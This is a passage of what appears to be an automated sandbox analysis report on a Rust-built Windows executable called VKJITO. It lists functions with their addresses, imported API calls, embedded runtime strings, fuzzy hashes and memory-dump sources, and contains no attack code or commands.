                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: aa061e2847dd869f3f3a7757d26fc3c8787be967da1b8a0eb5af6006221e17d8
                                      • Instruction ID: 91399b09d94280b5e09f536c775f04bd6e0f1ba46a23f037e5493e1e2c30c8fd
                                      • Opcode Fuzzy Hash: aa061e2847dd869f3f3a7757d26fc3c8787be967da1b8a0eb5af6006221e17d8
                                      • Instruction Fuzzy Hash: E061A2A3364B60427A04CFF2A935887E7A6F34ABD8B15F435AF9D57B18DA3CD452C600
                                      Function 00007FF7D43505B0 Relevance: .2, Instructions: 208COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e6f88f569e009ea383a906b11eb5c41433ef93909dce4e31778509fccc518902
                                      • Instruction ID: 025da28ff063d63275b6a28c929ad5888eb98e1b83e26832173b6047be9c4b51
                                      • Opcode Fuzzy Hash: e6f88f569e009ea383a906b11eb5c41433ef93909dce4e31778509fccc518902
                                      • Instruction Fuzzy Hash: 9C5125B3B25B34452A00DFA2BE20C676A50F75CBD4B4A7815EE8C97B45CE3CCA95E304
                                      Function 00007FF7D4350AB0 Relevance: .2, Instructions: 208COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7c491594b5c1d11b06ea3c1f24ede35a1ac1d72a7a81866782b57f956aac49e7
                                      • Instruction ID: 76f09a74a532eca96d00b4f29785c6379b45e5db180f394620cee93d90c90df5
                                      • Opcode Fuzzy Hash: 7c491594b5c1d11b06ea3c1f24ede35a1ac1d72a7a81866782b57f956aac49e7
                                      • Instruction Fuzzy Hash: 96513AA3B19B30456A00CFA1BD21C676A50F758FD4F4A7825EF8C97B45CE3CCA91E200
                                      Function 00007FF7D4350880 Relevance: .2, Instructions: 165COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f9c32496ecfd97439d2b4d119587a6c7a3004efda628f329c2840494c36d5e67
                                      • Instruction ID: 1f6f754917f5495db1b4beb9665ac33c98be099d974f938e923ee48b84d20b29
                                      • Opcode Fuzzy Hash: f9c32496ecfd97439d2b4d119587a6c7a3004efda628f329c2840494c36d5e67
                                      • Instruction Fuzzy Hash: 8B413463716B188A7A50DFA2BE60567A691B71CBC4F4DB832EE4C87704CE3CD6829240
                                      Function 00007FF7D4350D80 Relevance: .2, Instructions: 151COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0f9bf80d8afecc9da5a1a7b24e139040353467d58a90821988d65bf6b54f1471
                                      • Instruction ID: 049e346f6864221e09c5c86e180e9107f9902f3dba61b4e16d44fb6a0afc068e
                                      • Opcode Fuzzy Hash: 0f9bf80d8afecc9da5a1a7b24e139040353467d58a90821988d65bf6b54f1471
                                      • Instruction Fuzzy Hash: B8514EA9D15FC942F313663C54032B2E3285FFB199E51E307FDD0B9E26C791AB4AA214
                                      Function 00007FF7D434D330 Relevance: .1, Instructions: 144COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 30085b4081cdce905a621a0b67a6044b82c834c657b575b8f304bbe6d0fe82ad
                                      • Instruction ID: a987edc3ead5c74a6f46633260b01e69b30b33f62d5e17eac598f8325ea77f4f
                                      • Opcode Fuzzy Hash: 30085b4081cdce905a621a0b67a6044b82c834c657b575b8f304bbe6d0fe82ad
                                      • Instruction Fuzzy Hash: 76412772F046A542FA54DF56EAA0ABCB651E390BD4F81A037CD1E63B84CE3CD956C380
                                      Function 00007FF7D43526A0 Relevance: .1, Instructions: 118COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cd501bcd0fca7d58818bfe5b4041dd28b983f2d4f86e83acaaf1f1446665f536
                                      • Instruction ID: 0e938c0dcc93ea2e8698c7c8b6fa9b1c089d274af027e0945c0b23b6add3398b
                                      • Opcode Fuzzy Hash: cd501bcd0fca7d58818bfe5b4041dd28b983f2d4f86e83acaaf1f1446665f536
                                      • Instruction Fuzzy Hash: B341D623B0D68245EB29DF5AD09177DAF91A7A0780FC5853FCA4E27680EE3DD448CB21
                                      Function 00007FF7D434D040 Relevance: .1, Instructions: 93COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2f140545ccbb1525e7f329287da5d11cb7888fdce5abd42ef7b2c71986febe68
                                      • Instruction ID: 0a132502d8427d6093ba1c1b3b6086541e72c448b30e985eb8d4a959f82091ac
                                      • Opcode Fuzzy Hash: 2f140545ccbb1525e7f329287da5d11cb7888fdce5abd42ef7b2c71986febe68
                                      • Instruction Fuzzy Hash: 1E31B9E5B18FC142FE40EBA9746637B9311A7857D0F80E236DE8D6A70ADF2ED1428244
                                      Function 00007FF7D434D1C0 Relevance: .1, Instructions: 90COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2796ec57537121fd8b622c319fe21d7ab3bc50e34897546efa2265c3a097e548
                                      • Instruction ID: 9ae59175facd26f2b632c4980c1aa7571bc1eaebce3dc7fc7d5f21192d083681
                                      • Opcode Fuzzy Hash: 2796ec57537121fd8b622c319fe21d7ab3bc50e34897546efa2265c3a097e548
                                      • Instruction Fuzzy Hash: DE31D8E6B18FC042FE40E7A9746737B9311A7853D0F80E236DE8D6A60BDF2DD1428244
                                      Function 00007FF7D43526D3 Relevance: .1, Instructions: 85COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4af982ac453bbedf6d4f96f0524be61fbbb53de5fcff856ddf31ea94f00c68a3
                                      • Instruction ID: 1ca847d6c601332ac85921c3bfa0f6c07413964da0d58dc0ffe3526046f8c3d8
                                      • Opcode Fuzzy Hash: 4af982ac453bbedf6d4f96f0524be61fbbb53de5fcff856ddf31ea94f00c68a3
                                      • Instruction Fuzzy Hash: 0C31C733B0D2C245EF69DE5AD0A177D6E905760780FC9893FCA5E17280ED2D9449CB31
                                      Function 00007FF7D435AB64 Relevance: .0, Instructions: 2COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 139fcc1d29d5164657fec0e5ebe7fb8d097fce3a6ea25197e54d9d4acd5e8263
                                      • Instruction ID: d9daa129e953b7373f4eb04363bcb6c9b9285a509f793e98b75535023245afcb
                                      • Opcode Fuzzy Hash: 139fcc1d29d5164657fec0e5ebe7fb8d097fce3a6ea25197e54d9d4acd5e8263
                                      • Instruction Fuzzy Hash: CAA0012190885291FA08BF2AE991078AA31AB50302BC1027AC10D615A4AE6CA540A361
                                      Function 00007FF7D434BCB0 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 222libraryloadersynchronizationCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WaitForSingleObjectEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00007FF7D434BCF8
                                      • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00007FF7D434BD11
                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00007FF7D434BD4A
                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00007FF7D434BD82
                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00007FF7D434BDBB
                                      • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00007FF7D434BDD4
                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00007FF7D434BE12
                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00007FF7D434BE6C
                                      • CreateMutexA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00007FF7D434BEFE
                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00007FF7D434BF23
                                      • ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00007FF7D434BF69
                                      • ReleaseMutex.KERNEL32(?,?,?,?,?), ref: 00007FF7D434C01E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: AddressProc$Mutex$CurrentProcessRelease$CloseCreateHandleLibraryLoadObjectSingleWait
                                      • String ID: SymAddrIncludeInlineTrace$SymGetOptions$SymInitializeW$SymSetOptions$called `Option::unwrap()` on a `None` value/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\io\borrowed_buf.rs/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\alloc\src\collections\btree\navigate.rs$dbghelp.dll
                                      • API String ID: 2119853198-2283261341
                                      • Opcode ID: 4b2c1fc9ce42c7ae5ebe4485f88a3dde7baefa0ee0026cf6fe2f04af51483210
                                      • Instruction ID: 0d38f441c8cd5c7d0a59887375f664c6d65d19b0b7eab7444a409de1877d6378
                                      • Opcode Fuzzy Hash: 4b2c1fc9ce42c7ae5ebe4485f88a3dde7baefa0ee0026cf6fe2f04af51483210
                                      • Instruction Fuzzy Hash: C7A1C121A09A5295FB14AF2FEC803BCA7A0BF45B54FC4513AD99D666A0DF3CE185C730
                                      Function 00007FF7D4348BE3 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 253COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      • failed to spawn thread, xrefs: 00007FF7D43490A4
                                      • /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs, xrefs: 00007FF7D43490E4
                                      • cannot access a Thread Local Storage value during or after destructionlibrary\std\src\thread\local.rs, xrefs: 00007FF7D434911C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: Handle$CurrentDuplicateProcess$CloseErrorLast
                                      • String ID: /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs$cannot access a Thread Local Storage value during or after destructionlibrary\std\src\thread\local.rs$failed to spawn thread
                                      • API String ID: 120317985-263981136
                                      • Opcode ID: f3595bf2b31cfea6e23347fd63f60a5d7f440528f5d008c8782841e6d9b50d3a
                                      • Instruction ID: bc7dfb5979da6e1002349142c432f6d958064cf48e561e0ae6d4cc1003ed9e91
                                      • Opcode Fuzzy Hash: f3595bf2b31cfea6e23347fd63f60a5d7f440528f5d008c8782841e6d9b50d3a
                                      • Instruction Fuzzy Hash: 25C18022A09B8189E715AF3AD8843ED77A0FB54748FD4413AEA8D13B95DF3DE494C360
                                      Function 00007FF7D43310E0 Relevance: 12.2, APIs: 7, Strings: 1, Instructions: 205COMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.VCRUNTIME140(00000001,?,?,?,?,00000000,?,?,00007FF7D4326713), ref: 00007FF7D4331124
                                      • memmove.VCRUNTIME140(00000001,?,?,?,?,00000000,?,?,00007FF7D4326713), ref: 00007FF7D433114A
                                      • memmove.VCRUNTIME140(00000001,?,?,?,?,00000000,?,?,00007FF7D4326713), ref: 00007FF7D43311C5
                                      • memmove.VCRUNTIME140(00000001,?,?,?,?,00000000,?,?,00007FF7D4326713), ref: 00007FF7D43311DA
                                      • memmove.VCRUNTIME140(00000001,?,?,?,?,00000000,?,?,00007FF7D4326713), ref: 00007FF7D4331210
                                      • memmove.VCRUNTIME140(00000001,?,?,?,?,00000000,?,?,00007FF7D4326713), ref: 00007FF7D4331231
                                      • memmove.VCRUNTIME140(00000001,?,?,?,?,00000000,?,?,00007FF7D4326713), ref: 00007FF7D4331358
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: memmove$memset
                                      • String ID: assertion failed: n <= bs
                                      • API String ID: 3790616698-2139787691
                                      • Opcode ID: 1b3127f00a3030e7e3460ab684fe8014dd420f783fe365a7cc107eb72fc79516
                                      • Instruction ID: 71d879051ad5ea831038dfd7ce4230cc294c509b106c7065d0d065b0c112abed
                                      • Opcode Fuzzy Hash: 1b3127f00a3030e7e3460ab684fe8014dd420f783fe365a7cc107eb72fc79516
                                      • Instruction Fuzzy Hash: 0781E322E0869695EB20BF2AD8952EDA754BF457A4FC04237ED9C5B7C5CE3CD642C320
                                      Function 00007FF7D433D840 Relevance: 12.1, APIs: 8, Instructions: 140fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: CloseHandle$FileSleep$ErrorLastReadWritememset
                                      • String ID:
                                      • API String ID: 3673338832-0
                                      • Opcode ID: 2229b28413a99fa0d821bd83a9e28f30ab5c7d6d307353ba698ae4c13c8db627
                                      • Instruction ID: 7e653d696fea28415bd00ca473b3c28bf52feba3880dd395cb44fec135cd2f41
                                      • Opcode Fuzzy Hash: 2229b28413a99fa0d821bd83a9e28f30ab5c7d6d307353ba698ae4c13c8db627
                                      • Instruction Fuzzy Hash: 81513E22604AC694E731AF2AEC457FD6760FB44798F84413AED5C1BB98DF789286D310
                                      Function 00007FF7D434AC20 Relevance: 10.8, APIs: 7, Instructions: 263COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: ErrorLast$FullNamePathmemcmpmemmove
                                      • String ID:
                                      • API String ID: 2319842497-0
                                      • Opcode ID: cf7ad302de7728fc650c73c33ae6d099592146cabde4fb3e650b8427a8ac7eea
                                      • Instruction ID: 02406df6b09d98d2c211d30470c155336f07c70e79873b13e3c4049ac5c8cc14
                                      • Opcode Fuzzy Hash: cf7ad302de7728fc650c73c33ae6d099592146cabde4fb3e650b8427a8ac7eea
                                      • Instruction Fuzzy Hash: 3EB18162A04BC286EB75AF2ADC843EDA754FB44B98FC4413ADE5D6B785DF38D2418310
                                      Function 00007FF7D434B140 Relevance: 10.8, APIs: 7, Instructions: 259COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: ErrorLast$FullNamePathmemcmp
                                      • String ID:
                                      • API String ID: 2929619185-0
                                      • Opcode ID: 2a533ef179a7183f35ae18e143f62a954d9cc98c63aa3ade5495b0ccec5ecdf9
                                      • Instruction ID: cf92fdc2653494544215d091958982894ca423411902b98803119bcd528489bb
                                      • Opcode Fuzzy Hash: 2a533ef179a7183f35ae18e143f62a954d9cc98c63aa3ade5495b0ccec5ecdf9
                                      • Instruction Fuzzy Hash: 4CB16062A04BC285EB75AF2ADD843EDA759FB04B98FD0413ADE5C6B785DF38D2418310
                                      Function 00007FF7D4340FB0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 230windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      • assertion failed: self.is_char_boundary(new_len)/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\alloc\src\string.rs, xrefs: 00007FF7D4341334
                                      • NTDLL.DLL, xrefs: 00007FF7D4341008
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: ErrorFormatHandleLastMessageModulememset
                                      • String ID: NTDLL.DLL$assertion failed: self.is_char_boundary(new_len)/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\alloc\src\string.rs
                                      • API String ID: 1434010500-313772267
                                      • Opcode ID: 4faf0fd0c90817c6fcaca654bddc8f4c1fb2edc4ab12b504d66ec4c636cb8032
                                      • Instruction ID: 7fee54a49cd5d58fd7913d768953765fa67a501fb1adb7567805abef03619935
                                      • Opcode Fuzzy Hash: 4faf0fd0c90817c6fcaca654bddc8f4c1fb2edc4ab12b504d66ec4c636cb8032
                                      • Instruction Fuzzy Hash: B2A19432A09FC295EB319F2ADC847FCA7A0BB04384FC4413BDA9D56A95DF789685D310
                                      Function 00007FF7D4335AE0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: memmove
                                      • String ID: assertion failed: old_left_len + count <= CAPACITY
                                      • API String ID: 2162964266-323339215
                                      • Opcode ID: 452feccd1db8fa0d10035c291713d94de8059aca1dfa39c42d016ee7b47553d7
